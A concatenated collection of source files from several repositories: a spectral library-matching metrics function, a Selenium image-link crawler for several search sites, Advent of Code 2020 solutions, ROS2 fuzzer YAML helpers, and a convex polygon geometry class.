library_entry_of_prediction, num_library_elements) = library_matching(
combined_data, predictor_fn, similarity_provider, mass_tolerance,
eval_batch_size)
true_inchikeys = true_data[fmap_constants.INCHIKEY]
predicted_inchikeys = predicted_data[fmap_constants.INCHIKEY]
best_query_ranks = true_data['rank']['lowest']
metrics_dict = {}
if log_dir is not None:
metrics_dict['prediction_logging'] = _make_logging_ops(
true_inchikeys, predicted_inchikeys, best_query_ranks, log_dir)
correct_prediction = tf.equal(true_inchikeys, predicted_inchikeys)
metrics_dict['library_matching_accuracy'] = tf.metrics.mean(
correct_prediction)
metrics_dict[
'library_matching_fingerprint_jaccard_similarity'] = tf.metrics.mean_iou(
tf.cast(true_data[FP_NAME_FOR_JACCARD_SIMILARITY] > 0, tf.int32),
tf.cast(predicted_data[FP_NAME_FOR_JACCARD_SIMILARITY] > 0, tf.int32),
2)
metrics_dict['library_match_similarity'] = tf.metrics.mean(
predicted_data['similarity'])
metrics_dict['ground_truth_similarity'] = tf.metrics.mean(
true_data['similarity'])
metrics_dict['average_query_rank'] = tf.metrics.mean(best_query_ranks)
for i in [5, 10, 25, 50, 100]:
metrics_dict['recall@%d' % i] = tf.metrics.mean(best_query_ranks < i)
metrics_dict['mean_reciprocal_rank'] = tf.metrics.mean(
tf.pow(tf.to_float(best_query_ranks) + 1, -1))
avg_query_ranks = true_data['rank']['avg']
metrics_dict['avg-rank-average_query_rank'] = tf.metrics.mean(avg_query_ranks)
num_candidates_with_better_scores = true_data['rank']['lowest']
num_candidates_with_worse_scores = (
num_library_elements - 1 - true_data['rank']['highest'])
num_candidates_with_worse_scores = tf.maximum(
num_candidates_with_worse_scores, 0)
relative_ranking_position = 0.5 * (
1 +
(num_candidates_with_better_scores - num_candidates_with_worse_scores) /
(num_library_elements - 1))
metrics_dict['relative_ranking_position'] = tf.metrics.mean(
relative_ranking_position)
for i in [5, 10, 25, 50, 100]:
metrics_dict['avg-rank-recall@%d' %
i] = tf.metrics.mean(avg_query_ranks < i)
return (metrics_dict, library_entry_of_prediction,
predicted_data[fmap_constants.INCHIKEY])
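# Minimal call sketch for the evaluation entry point above; the combined_data,
# predictor_fn, and similarity_provider objects are assumptions about the
# surrounding training/evaluation code, not defined in this file:
#     metrics, library_spectra, library_inchikeys = library_match_accuracy(
#         combined_data, predictor_fn, eval_batch_size=500,
#         similarity_provider=similarity_provider, mass_tolerance=1.0)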
``` |
{
"source": "jnwnlee/AutoCrawler",
"score": 2
} |
#### File: jnwnlee/AutoCrawler/collect_links.py
```python
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.common.exceptions import ElementNotVisibleException, StaleElementReferenceException
import platform
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.action_chains import ActionChains
from webdriver_manager.chrome import ChromeDriverManager
import os.path as osp
class CollectLinks:
def __init__(self, no_gui=False, proxy=None):
executable = ''
if platform.system() == 'Windows':
print('Detected OS : Windows')
executable = './chromedriver/chromedriver_win.exe'
elif platform.system() == 'Linux':
print('Detected OS : Linux')
executable = './chromedriver/chromedriver_linux'
elif platform.system() == 'Darwin':
print('Detected OS : Mac')
executable = './chromedriver/chromedriver_mac'
else:
raise OSError('Unknown OS Type')
if not osp.exists(executable):
raise FileNotFoundError('Chromedriver file should be placed at {}'.format(executable))
chrome_options = Options()
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--disable-dev-shm-usage')
chrome_options.add_experimental_option('excludeSwitches', ['enable-logging'])
if no_gui:
chrome_options.add_argument('--headless')
if proxy:
chrome_options.add_argument("--proxy-server={}".format(proxy))
self.browser = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=chrome_options)
browser_version = 'Failed to detect version'
chromedriver_version = 'Failed to detect version'
major_version_different = False
if 'browserVersion' in self.browser.capabilities:
browser_version = str(self.browser.capabilities['browserVersion'])
if 'chrome' in self.browser.capabilities:
if 'chromedriverVersion' in self.browser.capabilities['chrome']:
chromedriver_version = str(self.browser.capabilities['chrome']['chromedriverVersion']).split(' ')[0]
if browser_version.split('.')[0] != chromedriver_version.split('.')[0]:
major_version_different = True
print('_________________________________')
print('Current web-browser version:\t{}'.format(browser_version))
print('Current chrome-driver version:\t{}'.format(chromedriver_version))
if major_version_different:
print('warning: Version different')
print(
'Download correct version at "http://chromedriver.chromium.org/downloads" and place in "./chromedriver"')
print('_________________________________')
def get_scroll(self):
pos = self.browser.execute_script("return window.pageYOffset;")
return pos
def wait_and_click(self, xpath):
# Sometimes click fails unreasonably. So tries to click at all cost.
try:
w = WebDriverWait(self.browser, 15)
elem = w.until(EC.element_to_be_clickable((By.XPATH, xpath)))
self.highlight(elem)
elem.click()
except Exception as e:
print('Click time out - {}'.format(xpath))
print('Exception {}'.format(e))
print('Refreshing browser...')
self.browser.refresh()
time.sleep(2)
return self.wait_and_click(xpath)
return elem
def highlight(self, element):
self.browser.execute_script("arguments[0].setAttribute('style', arguments[1]);", element,
"background: yellow; border: 2px solid red;")
@staticmethod
def remove_duplicates(_list):
return list(dict.fromkeys(_list))
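    # Minimal usage sketch for the scrapers below; the keyword and limit are
    # illustrative assumptions:
    #     collector = CollectLinks(no_gui=True)
    #     links = collector.google('cat', max_count=100)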
def google(self, keyword, add_url="", max_count=10000):
self.browser.get("https://www.google.com/search?q={}&source=lnms&tbm=isch{}".format(keyword, add_url))
time.sleep(1)
print('Scrolling down')
elem = self.browser.find_element_by_tag_name("body")
for i in range(60):
elem.send_keys(Keys.PAGE_DOWN)
time.sleep(0.2)
try:
# You may need to change this. Because google image changes rapidly.
# btn_more = self.browser.find_element(By.XPATH, '//input[@value="결과 더보기"]')
# self.wait_and_click('//input[@id="smb"]')
self.wait_and_click('//input[@type="button"]')
except ElementNotVisibleException:
pass
while True:
for i in range(60):
elem.send_keys(Keys.PAGE_DOWN)
time.sleep(0.2)
photo_grid_boxes = self.browser.find_elements(By.XPATH, '//div[@class="bRMDJf islir"]')
if len(photo_grid_boxes) > max_count: break
print('Scraping links')
links = []
for box in photo_grid_boxes:
try:
imgs = box.find_elements(By.TAG_NAME, 'img')
for img in imgs:
# self.highlight(img)
src = img.get_attribute("src")
# Google seems to preload 20 images as base64
if str(src).startswith('data:'):
src = img.get_attribute("data-iurl")
links.append(src)
except Exception as e:
print('[Exception occurred while collecting links from google] {}'.format(e))
links = self.remove_duplicates(links)
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('google', keyword, len(links)))
self.browser.close()
return links
def naver(self, keyword, add_url="", max_count=10000):
self.browser.get(
"https://search.naver.com/search.naver?where=image&sm=tab_jum&query={}{}".format(keyword, add_url))
time.sleep(1)
print('Scrolling down')
elem = self.browser.find_element_by_tag_name("body")
while True:
for i in range(60):
elem.send_keys(Keys.PAGE_DOWN)
time.sleep(0.2)
imgs = self.browser.find_elements(By.XPATH,
'//div[@class="photo_bx api_ani_send _photoBox"]//img[@class="_image _listImage"]')
if len(imgs) > max_count: break
print('Scraping links')
links = []
for img in imgs:
try:
src = img.get_attribute("src")
if src[0] != 'd':
links.append(src)
except Exception as e:
print('[Exception occurred while collecting links from naver] {}'.format(e))
links = self.remove_duplicates(links)
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('naver', keyword, len(links)))
self.browser.close()
return links
def unsplash(self, keyword, add_url="", srcset_idx=0, max_count=10000):
self.browser.get("https://unsplash.com/s/photos/{}".format(keyword)) # , add_url
time.sleep(1)
print('Scrolling down')
elem = self.browser.find_element_by_tag_name("body")
for i in range(60):
elem.send_keys(Keys.PAGE_DOWN)
time.sleep(0.2)
try:
# You may need to change this. Because google image changes rapidly.
# btn_more = self.browser.find_element(By.XPATH, '//input[@value="결과 더보기"]')
# self.wait_and_click('//input[@id="smb"]')
# self.wait_and_click('//div[@class="gDCZZ"]/button')
button = self.browser.find_element_by_xpath('//div[@class="gDCZZ"]//button')
self.highlight(button)
time.sleep(1)
button.send_keys(Keys.ENTER)
except Exception as e:
print(e)
# pass
# reached_page_end = False
# last_height = self.browser.execute_script("return document.body.scrollHeight")
while True:
# for i in range(30):
# elem.send_keys(Keys.PAGE_DOWN)
# time.sleep(0.4)
# time.sleep(1)
photo_grid_boxes = self.browser.find_elements(By.XPATH, '//div[@class="ripi6"]//figure[@itemprop="image"]')
# new_height = self.browser.execute_script("return document.body.scrollHeight")
# if last_height == new_height:
# reached_page_end = True
# else:
# last_height = new_height
try:
loading = self.browser.find_element_by_xpath('//div[@class="MvqOi"]') # loading icon
self.browser.execute_script("arguments[0].scrollIntoView(true);", loading)
elem.send_keys(Keys.PAGE_UP)
time.sleep(1)
except:
break
if len(photo_grid_boxes) > max_count:
break
else:
continue
print('Scraping links')
links = []
for box in photo_grid_boxes:
try:
imgs = box.find_elements(By.XPATH, './/img[@class="YVj9w"]') # By.TAG_NAME, 'img')
for img in imgs:
# self.highlight(img)
src = img.get_attribute("srcset")
src = src.split(', ')[srcset_idx].split(' ')[:-1] # 800w
src = ' '.join(src)
# Google seems to preload 20 images as base64
if str(src).startswith('data:'):
src = img.get_attribute("data-iurl")
links.append(src)
except Exception as e:
print('[Exception occurred while collecting links from unsplash] {}'.format(e))
links = self.remove_duplicates(links)
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('unsplash', keyword, len(links)))
self.browser.close()
return links
def flickr(self, keyword, add_url="", max_count=10000, full=False):
self.browser.get("https://www.flickr.com/search/?text={}&media=photos{}".format(keyword, add_url))
time.sleep(1)
print('Scrolling down')
elem = self.browser.find_element_by_tag_name("body")
for i in range(60):
elem.send_keys(Keys.PAGE_DOWN)
time.sleep(0.2)
# try:
# button = self.browser.find_element_by_xpath('.//div[@class="infinite-scroll-load-more"]/button')
# self.highlight(button)
# time.sleep(1)
# self.browser.execute_script("arguments[0].click();", button)
# except:
# pass
# # ActionChains(self.browser).move_to_element(button).click(button).perform()
# for i in range(100):
# elem.send_keys(Keys.PAGE_DOWN)
# time.sleep(0.2)
time.sleep(2)
# reached_page_end = False
# last_height = self.browser.execute_script("return document.body.scrollHeight")
while True:
imgs = self.browser.find_elements(By.XPATH,
'//div[@class="view photo-list-photo-view awake"]')
if len(imgs) > max_count:
break
self.browser.execute_script("arguments[0].scrollIntoView(true);", imgs[-1])
last_height = self.browser.execute_script("return document.body.scrollHeight")
time.sleep(1)
for i in range(2):
elem.send_keys(Keys.PAGE_DOWN)
time.sleep(0.2)
new_height = self.browser.execute_script("return document.body.scrollHeight")
if not last_height == new_height:
continue
# reached_page_end = True
# else:
# last_height = new_height
try:
button = self.browser.find_element_by_xpath('//div[@class="infinite-scroll-load-more"]//button')
# self.browser.execute_script("arguments[0].click();", button)
button.send_keys(Keys.ENTER)
time.sleep(0.5)
except Exception as e:
# print(e)
try:
self.browser.find_element_by_xpath('//div[@class="flickr-dots"]')
except:
print('No buttons and loading..')
print(e)
break
else:
while True:
self.browser.find_element_by_xpath('//div[@class="flickr-dots"]')
time.sleep(3)
imgs = self.browser.find_elements(By.XPATH,
'//div[@class="view photo-list-photo-view awake"]')
print('Scraping links')
links = []
if full:
print('[Full Resolution Mode]')
self.browser.maximize_window()
# self.wait_and_click('//div[@class="view photo-list-photo-view awake"]//a')
# time.sleep(1)
first_img = self.browser.find_element_by_xpath('//div[@class="view photo-list-photo-view awake"]//a')
self.highlight(first_img)
time.sleep(2)
self.browser.execute_script("arguments[0].click();", first_img)
while True:
try:
w = WebDriverWait(self.browser, 5)
xpath = '//div[@class="view photo-well-scrappy-view"]//img[@class="main-photo"]'
img_low = w.until(EC.presence_of_element_located((By.XPATH, xpath)))
src_low = img_low.get_attribute('src')
src_low = src_low.split('.')
src_low[-2] = '_'.join(src_low[-2].split('_')[:-1])
src_low = '.'.join(src_low)
w = WebDriverWait(self.browser, 3)
xpath = '//div[@class="engagement-item download "]//i[@class="ui-icon-download"]'
down_icon = w.until(EC.presence_of_element_located((By.XPATH, xpath)))
self.highlight(down_icon)
down_icon.click()
except StaleElementReferenceException:
# print('[Expected Exception - StaleElementReferenceException]')
pass
except Exception as e:
print('[Exception occurred while collecting links from flickr_full] {}'.format(e))
time.sleep(1)
else:
try:
xpath = '//div[@class="content html-only auto-size"]'
link_list = w.until(EC.presence_of_element_located((By.XPATH, xpath)))
self.highlight(link_list)
                        a_link = link_list.find_element(By.XPATH, '//li[@class="원본"]/a')
self.highlight(a_link)
src = a_link.get_attribute('href')
except:
src = src_low
escape = self.browser.find_element_by_xpath('//div[@class="fluid-modal-overlay transparent"]')
escape.click()
if src is not None:
if not str(src).startswith('https:'):
src = "https:" + str(src)
links.append(src)
print('%d: %s' % (len(links), src))
if len(links) > max_count:
break
try:
self.browser.find_element_by_xpath('//a[@class="navigate-target navigate-next"]')
except:
print('!!!!!!!!!!!!!')
time.sleep(10)
break
elem.send_keys(Keys.RIGHT)
while True:
loader_bar = self.browser.find_element_by_xpath('//div[@class="loader-bar"]')
                    if loader_bar.get_attribute('display') is None:
time.sleep(0.1)
break
# time.sleep(0.5)
else:
for img in imgs:
try:
src = img.get_attribute('style').split('background-image: url("')[-1]
src = ''.join(src[:-3]) # get_attribute("style")["background-image"]
if not str(src).startswith('https:'):
src = "https:" + str(src)
links.append(src)
except Exception as e:
print('[Exception occurred while collecting links from flickr] {}'.format(e))
links = self.remove_duplicates(links)
if full:
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('flickr_full', keyword, len(links)))
else:
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('flickr', keyword, len(links)))
self.browser.close()
print('# links', len(links))
return links
def google_full(self, keyword, add_url="", max_count=10000):
print('[Full Resolution Mode]')
self.browser.get("https://www.google.com/search?q={}&tbm=isch{}".format(keyword, add_url))
time.sleep(1)
elem = self.browser.find_element_by_tag_name("body")
print('Scraping links')
self.wait_and_click('//div[@data-ri="0"]')
time.sleep(1)
links = []
count = 1
last_scroll = 0
scroll_patience = 0
while True:
try:
xpath = '//div[@id="islsp"]//div[@class="v4dQwb"]'
div_box = self.browser.find_element(By.XPATH, xpath)
self.highlight(div_box)
xpath = '//img[@class="n3VNCb"]'
img = div_box.find_element(By.XPATH, xpath)
self.highlight(img)
xpath = '//div[@class="k7O2sd"]'
loading_bar = div_box.find_element(By.XPATH, xpath)
# Wait for image to load. If not it will display base64 code.
while str(loading_bar.get_attribute('style')) != 'display: none;':
time.sleep(0.1)
src = img.get_attribute('src')
if src is not None:
links.append(src)
# print('%d: %s' % (count, src))
count += 1
except StaleElementReferenceException:
# print('[Expected Exception - StaleElementReferenceException]')
pass
except Exception as e:
print('[Exception occurred while collecting links from google_full] {}'.format(e))
scroll = self.get_scroll()
if scroll == last_scroll:
scroll_patience += 1
else:
scroll_patience = 0
last_scroll = scroll
if scroll_patience >= 50 or len(links) > max_count:
break
elem.send_keys(Keys.RIGHT)
links = self.remove_duplicates(links)
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('google_full', keyword, len(links)))
self.browser.close()
return links
def naver_full(self, keyword, add_url="", max_count=10000):
print('[Full Resolution Mode]')
self.browser.get(
"https://search.naver.com/search.naver?where=image&sm=tab_jum&query={}{}".format(keyword, add_url))
time.sleep(1)
elem = self.browser.find_element_by_tag_name("body")
print('Scraping links')
self.wait_and_click('//div[@class="photo_bx api_ani_send _photoBox"]')
time.sleep(1)
links = []
count = 1
last_scroll = 0
scroll_patience = 0
while True:
try:
xpath = '//div[@class="image _imageBox"]/img[@class="_image"]'
imgs = self.browser.find_elements(By.XPATH, xpath)
for img in imgs:
self.highlight(img)
src = img.get_attribute('src')
if src not in links and src is not None:
links.append(src)
# print('%d: %s' % (count, src))
count += 1
except StaleElementReferenceException:
# print('[Expected Exception - StaleElementReferenceException]')
pass
except Exception as e:
print('[Exception occurred while collecting links from naver_full] {}'.format(e))
scroll = self.get_scroll()
if scroll == last_scroll:
scroll_patience += 1
else:
scroll_patience = 0
last_scroll = scroll
if scroll_patience >= 100 or len(links) > max_count:
break
elem.send_keys(Keys.RIGHT)
elem.send_keys(Keys.PAGE_DOWN)
links = self.remove_duplicates(links)
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('naver_full', keyword, len(links)))
self.browser.close()
return links
def unsplash_full(self, keyword, add_url="", max_count=10000):
return self.unsplash(keyword, add_url, srcset_idx=-1, max_count=max_count)
def flickr_full(self, keyword, add_url="", max_count=10000):
return self.flickr(keyword, add_url, max_count, full=True)
if __name__ == '__main__':
collect = CollectLinks()
links = collect.naver_full('박보영')
print(len(links), links)
``` |
{
"source": "JnxF/advent-of-code-2020",
"score": 3
} |
#### File: JnxF/advent-of-code-2020/day04.py
```python
from aocd.models import Puzzle
import re
input: str = Puzzle(day=4, year=2020).input_data
fields = "byr iyr eyr hgt hcl ecl pid cid"
fields = set(fields.split(" "))
def part1():
passports = input.split("\n\n")
passports = [" ".join(t.split("\n")) for t in passports]
passports = [t.split(" ") for t in passports]
passports = [[w.split(":")[0] for w in t] for t in passports]
validPassports = [t for t in passports if set(t + ["cid"]) == fields]
return len(validPassports)
def part2():
rules = [
("byr", lambda x: 1920 <= int(x) <= 2002),
("iyr", lambda x: 2010 <= int(x) <= 2020),
("eyr", lambda x: 2020 <= int(x) <= 2030),
(
"hgt",
lambda x: len(x) > 2
and (
150 <= int(x[:-2]) <= 193 if x[-2:] == "cm" else 59 <= int(x[:-2]) <= 76
),
),
(
"hcl",
lambda x: len(x) == 7
and x[0] == "#"
and all(c in "0123456789abcdef" for c in x[1:]),
),
("ecl", lambda x: x in "amb blu brn gry grn hzl oth"),
("pid", lambda x: len(x) == 9 and all("0" <= c <= "9" for c in x)),
]
return sum(
all(key in passport and f(passport[key]) for key, f in rules)
for passport in (
dict(map(lambda x: x.split(":"), part))
for part in map(str.split, input.split("\n\n"))
)
)
```
#### File: JnxF/advent-of-code-2020/day09.py
```python
from aocd.models import Puzzle
input: str = Puzzle(day=9, year=2020).input_data
input = input.splitlines()
input = [int(line) for line in input]
preamble = 25
n = len(input)
def part1():
for idx in range(preamble, n):
current = input[idx]
currentPreamble = input[idx - preamble : idx]
s = set(currentPreamble)
isSumOfTwoPrevious = False
for previous in currentPreamble:
if (current - previous) in s and previous != current / 2:
isSumOfTwoPrevious = True
break
if not isSumOfTwoPrevious:
return current
def part2():
invalidIndex = part1()
carrySum = 0
value2Idx = dict()
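    # Prefix-sum trick: value2Idx maps each running sum to its index, so when
    # carrySum - invalidIndex (the invalid *value* returned by part1) has been seen
    # before, the entries after that index up to the current one sum exactly to it.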
for idx, current in enumerate(input):
carrySum += current
value2Idx[carrySum] = idx
if carrySum - invalidIndex in value2Idx.keys():
previousIndex = value2Idx[carrySum - invalidIndex] + 1
contiguousSet = input[previousIndex : idx + 1]
return min(contiguousSet) + max(contiguousSet)
```
#### File: JnxF/advent-of-code-2020/day11.py
```python
from aocd.models import Puzzle
from copy import deepcopy
input: str = Puzzle(day=11, year=2020).input_data
input = input.splitlines()
input = [list(line) for line in input]
n = len(input)
m = len(input[0])
def adjacent(i, j, state):
ret = []
for I in [i - 1, i, i + 1]:
for J in [j - 1, j, j + 1]:
if (i, j) != (I, J) and I >= 0 and J >= 0 and I < n and J < m:
ret.append(state[I][J])
return ret.count("#")
def iterate1(previousState):
nextState = deepcopy(previousState)
for i in range(n):
for j in range(m):
adjacentOccupiedCount = adjacent(i, j, previousState)
if previousState[i][j] == "L" and adjacentOccupiedCount == 0:
nextState[i][j] = "#"
elif previousState[i][j] == "#" and adjacentOccupiedCount >= 4:
nextState[i][j] = "L"
return nextState
def part1():
state = deepcopy(input)
previousCount = 0
while True:
state = iterate1(state)
currentSum = sum([line.count("#") for line in state])
if currentSum == previousCount:
return currentSum
previousCount = currentSum
def adjacent2(i, j, state):
total = 0
for di in [-1, 0, 1]:
for dj in [-1, 0, 1]:
if di == dj == 0:
continue
(I, J) = (i + di, j + dj)
while I >= 0 and J >= 0 and I < n and J < m and state[I][J] == ".":
(I, J) = (I + di, J + dj)
if I >= 0 and J >= 0 and I < n and J < m and state[I][J] == "#":
total += 1
return total
def iterate2(previousState):
nextState = deepcopy(previousState)
for i in range(n):
for j in range(m):
adjacentOccupiedCount = adjacent2(i, j, previousState)
if previousState[i][j] == "L" and adjacentOccupiedCount == 0:
nextState[i][j] = "#"
elif previousState[i][j] == "#" and adjacentOccupiedCount >= 5:
nextState[i][j] = "L"
return nextState
def part2():
state = deepcopy(input)
previousCount = 0
while True:
state = iterate2(state)
currentSum = sum([line.count("#") for line in state])
if currentSum == previousCount:
return currentSum
previousCount = currentSum
```
#### File: JnxF/advent-of-code-2020/day17.py
```python
from aocd.models import Puzzle
input: str = Puzzle(day=17, year=2020).input_data
input = input.splitlines()
n = len(input)
m = len(input[0])
displacement = (n - 1) // 2
originalNodes = set()
for i in range(n):
for j in range(m):
if input[i][j] == "#":
originalNodes.add((j - displacement, i - displacement, 0))
def active_neighbours(point, allThePoints):
if len(point) == 3:
x, y, z = point
w = None
else:
x, y, z, w = point
neighbours = []
for X in [x - 1, x, x + 1]:
for Y in [y - 1, y, y + 1]:
for Z in [z - 1, z, z + 1]:
if w is not None:
for W in [w - 1, w, w + 1]:
neighbours.append(((X, Y, Z, W), point))
else:
neighbours.append(((X, Y, Z), point))
return len(
list(filter(lambda x: x[0] != x[1] and x[0] in allThePoints, neighbours))
)
def iterate(current, fourdimensions=False):
next = set()
neighbours = []
for point in current:
if fourdimensions:
x, y, z, w = point
else:
x, y, z = point
if active_neighbours(point, current) in [2, 3]:
next.add(point)
for X in [x - 1, x, x + 1]:
for Y in [y - 1, y, y + 1]:
for Z in [z - 1, z, z + 1]:
if not fourdimensions:
neighbours.append(((X, Y, Z), point))
else:
for W in [w - 1, w, w + 1]:
neighbours.append(((X, Y, Z, W), point))
neighbours = [
point
for (point, reference) in neighbours
if active_neighbours(point, current) == 3
and point != reference
and point not in current
]
next |= set(neighbours)
return next
def part1():
nodes = originalNodes.copy()
for _ in range(6):
nodes = iterate(nodes)
return len(nodes)
def part2():
nodes = set()
for (x, y, z) in originalNodes:
nodes.add((x, y, z, 0))
for _ in range(6):
nodes = iterate(nodes, fourdimensions=True)
return len(nodes)
``` |
{
"source": "JnxF/automatic_fuzzing",
"score": 3
} |
#### File: ros2_automatic_fuzzer/auto_detector/detect_parameters.py
```python
import sys
from zenlog import log as logging
import os
from PyInquirer import prompt
import yaml
sys.path.append("..")
from yaml_utils.yaml_utils import read_and_validate_yaml_file
def yes_no_question(message: str, default=True):
return prompt(
{
"type": "confirm",
"message": message,
"name": "question",
"default": False,
}
)["question"]
def detect_parameters(rootDir: str):
yaml_obj: dict = read_and_validate_yaml_file(rootDir)
services: dict = yaml_obj["services"]
topics: dict = yaml_obj["topics"]
logging.info("Detecting services' parameters")
for service_name, service_value in services.items():
if "parameters" in service_value and service_value["parameters"] != []:
question_prompt = f"*Overwrite* parameters for service `{service_name}`?"
else:
question_prompt = f"Detect parameters for service `{service_name}`?"
if yes_no_question(question_prompt, False):
# TODO
pass
    for topic_name, topic_value in topics.items():
if yes_no_question(f"Detect parameters for topic `{topic_name}`?", False):
# TODO
pass
yaml_path = os.path.join(rootDir, "fuzz.yaml")
with open(yaml_path, "w") as outfile:
yaml.dump(yaml_obj, outfile, sort_keys=False)
logging.info("The file `fuzz.yaml` has been overwritten")
def ask_detect_parameters(rootDir: str):
if yes_no_question("Do you want to autodetect parameters?", False):
detect_parameters(rootDir)
```
#### File: ros2_automatic_fuzzer/yaml_utils/yaml_utils.py
```python
from zenlog import log as logging
import os
import json
import yamale
def ensure_yaml_exists(yaml_file_path: str) -> None:
if not os.path.exists(yaml_file_path):
logging.error(
"No fuzz.yaml file was found\n" "Have you run the auto_detecter command?"
)
exit(-1)
logging.debug(f"YAML file found at {yaml_file_path}")
def read_schema_file():
yaml_path = os.path.join(os.path.dirname(__file__), "schema.yaml")
schema = yamale.make_schema(yaml_path)
logging.debug("YAML schema read")
return schema
def read_yaml_file(path: str):
res = yamale.make_data(path)
logging.debug(f"YAML file loaded")
return res
def validate_yaml(yaml_obj, schema):
yamale.validate(schema, yaml_obj)
logging.debug("YAML file validated")
def verify_yaml_file(yaml_file_path: str):
schema = read_schema_file()
yaml_objs = read_yaml_file(yaml_file_path)
validate_yaml(yaml_objs, schema)
# yaml_obj is a list of (object, path)
# so we return the first item's object
return yaml_objs[0][0]
def read_and_validate_yaml_file(path: str) -> dict:
yaml_file_path = os.path.join(path, "fuzz.yaml")
ensure_yaml_exists(yaml_file_path)
yaml_obj = verify_yaml_file(yaml_file_path)
if "TODO" in json.dumps(yaml_obj):
logging.warning(
"The 'TODO' keyword was found in the yaml file\n"
"Did you forget to fill in the blanks?"
)
services_keys = (yaml_obj["services"] if "services" in yaml_obj else {}).keys()
topics_keys = (yaml_obj["topics"] if "topics" in yaml_obj else {}).keys()
actions_keys = (yaml_obj["actions"] if "actions" in yaml_obj else {}).keys()
logging.debug(
f"{len(topics_keys)} topics detected: {', '.join([f'`{s}`' for s in topics_keys])}"
)
logging.debug(
f"{len(services_keys)} services detected: {', '.join([f'`{s}`' for s in services_keys])}"
)
logging.debug(
f"{len(actions_keys)} actions detected: {', '.join([f'`{s}`' for s in actions_keys])}"
)
return yaml_obj
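if __name__ == "__main__":
    # Usage sketch (illustrative only): the directory below is hypothetical and is
    # expected to contain a fuzz.yaml file matching schema.yaml.
    print(read_and_validate_yaml_file("path/to/ros2_workspace"))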
``` |
{
"source": "JnxF/convex-polygons",
"score": 3
} |
#### File: JnxF/convex-polygons/ConvexPolygon.py
```python
from __future__ import annotations
from typing import List, Optional, Tuple
from functools import reduce
from PIL import Image, ImageDraw
from Point import Point
from copy import deepcopy
class ConvexPolygon:
def __init__(self, coordinates: List[Point]):
self.points = self._convex_hull(coordinates)
def __repr__(self):
return str(self.points) + " : " + str(self.num_vertices())
def __eq__(self, other):
if type(other) != ConvexPolygon:
return False
if len(self.points) != len(other.points):
return False
for (pa, pb) in zip(self.points, other.points):
if pa != pb:
return False
return True
@staticmethod
def _convex_hull(points):
TURN_LEFT, TURN_RIGHT, TURN_NONE = (1, -1, 0)
def cmp(a, b):
return (a > b) - (a < b)
def _turn(p, q, r):
return cmp((q.x - p.x) * (r.y - p.y) - (r.x - p.x) * (q.y - p.y), 0)
def _keep_left(hull, r):
while len(hull) > 1 and _turn(hull[-2], hull[-1], r) != TURN_LEFT:
hull.pop()
if not len(hull) or hull[-1] != r:
hull.append(r)
return hull
points = sorted(points)
l = reduce(_keep_left, points, [])
u = reduce(_keep_left, reversed(points), [])
return l.extend(u[i] for i in range(1, len(u) - 1)) or l
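    # Illustrative example (assumes Point sorts lexicographically by x then y):
    # interior points are dropped and the hull is returned counter-clockwise, e.g.
    #   _convex_hull([Point(0, 0), Point(2, 0), Point(2, 2), Point(0, 2), Point(1, 1)])
    #   -> [Point(0, 0), Point(2, 0), Point(2, 2), Point(0, 2)]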
    def inside_point(self, point: Point) -> bool:
        """Return True if the point lies inside or on the border of the polygon.
        Assumes the stored hull vertices are in counter-clockwise order, as
        produced by _convex_hull."""
        n = self.num_vertices()
        if n == 0:
            return False
        bbox = self.bounding_box()
        if not (bbox[0].x <= point.x <= bbox[1].x and bbox[0].y <= point.y <= bbox[1].y):
            return False
        # The point must never lie strictly to the right of a directed edge.
        for i in range(n):
            a = self.points[i]
            b = self.points[(i + 1) % n]
            if (b.x - a.x) * (point.y - a.y) - (b.y - a.y) * (point.x - a.x) < 0:
                return False
        return True
def num_vertices(self) -> int:
return len(self.points)
def num_edges(self) -> int:
n = self.num_vertices()
if n <= 1:
return 0
elif n == 2:
return 1
else:
return n
def perimeter(self) -> float:
n = self.num_vertices()
if n <= 1:
return 0
elif n == 2:
[v0, v1] = self.points
return v0.distance(v1)
else:
perimeter = 0.0
for idx, p in enumerate(self.points):
previous = self.points[-1] if idx == 0 else self.points[idx - 1]
perimeter += previous.distance(p)
return perimeter
def area(self) -> float:
n = self.num_vertices()
if n <= 2:
return 0
area = 0.0
for i in range(n - 1):
area += self.points[i].x * self.points[i + 1].y
area += self.points[n - 1].x * self.points[0].y
for i in range(n - 1):
area -= self.points[i + 1].x * self.points[i].y
area -= self.points[0].x * self.points[n - 1].y
return abs(area) / 2.0
def centroid(self) -> Optional[Point]:
n = self.num_vertices()
if n == 0:
return None
meanX, meanY = 0.0, 0.0
for p in self.points:
meanX += p.x
meanY += p.y
meanX /= n
meanY /= n
return Point(meanX, meanY)
def is_regular(self) -> bool:
n = self.num_vertices()
if n <= 1:
return True
if n == 2:
return False
# All vertices are to the same distance to each other
d = self.points[0].distance(self.points[1])
for idx, p in enumerate(self.points):
previous = self.points[-1] if idx == 0 else self.points[idx - 1]
if abs(previous.distance(p) - d) > 1e-7:
return False
return True
def bounding_box(self) -> Optional[Tuple[Point, Point]]:
n = self.num_vertices()
if n == 0:
return None
xs = [p.x for p in self.points]
ys = [p.y for p in self.points]
return (Point(min(xs), min(ys)), Point(max(xs), max(ys)))
def draw(self, outline="#000000"):
img = Image.new("RGB", (400, 400), "White")
dib = ImageDraw.Draw(img)
(pmin, pmax) = self.bounding_box()
dx = pmax.x - pmin.x
dy = pmax.y - pmin.y
myPol = [
(396.0 * (p.x - pmin.x) / dx + 2, 400 - (396.0 * (p.y - pmin.y) / dy + 2))
for p in self.points
]
dib.polygon(myPol, outline=outline)
img.save("image.png")
@staticmethod
def union(cp1: ConvexPolygon, cp2: ConvexPolygon):
return ConvexPolygon(deepcopy(cp1.points) + deepcopy(cp2.points))
if __name__ == "__main__":
print(ConvexPolygon([Point(0, 0), Point(0, 0)]))
``` |
{
"source": "JnxF/robot-dsl",
"score": 3
} |
#### File: robot-dsl/tx_robot/__init__.py
```python
from os.path import dirname, join
from textx import language, metamodel_from_file, TextXSemanticError, get_location
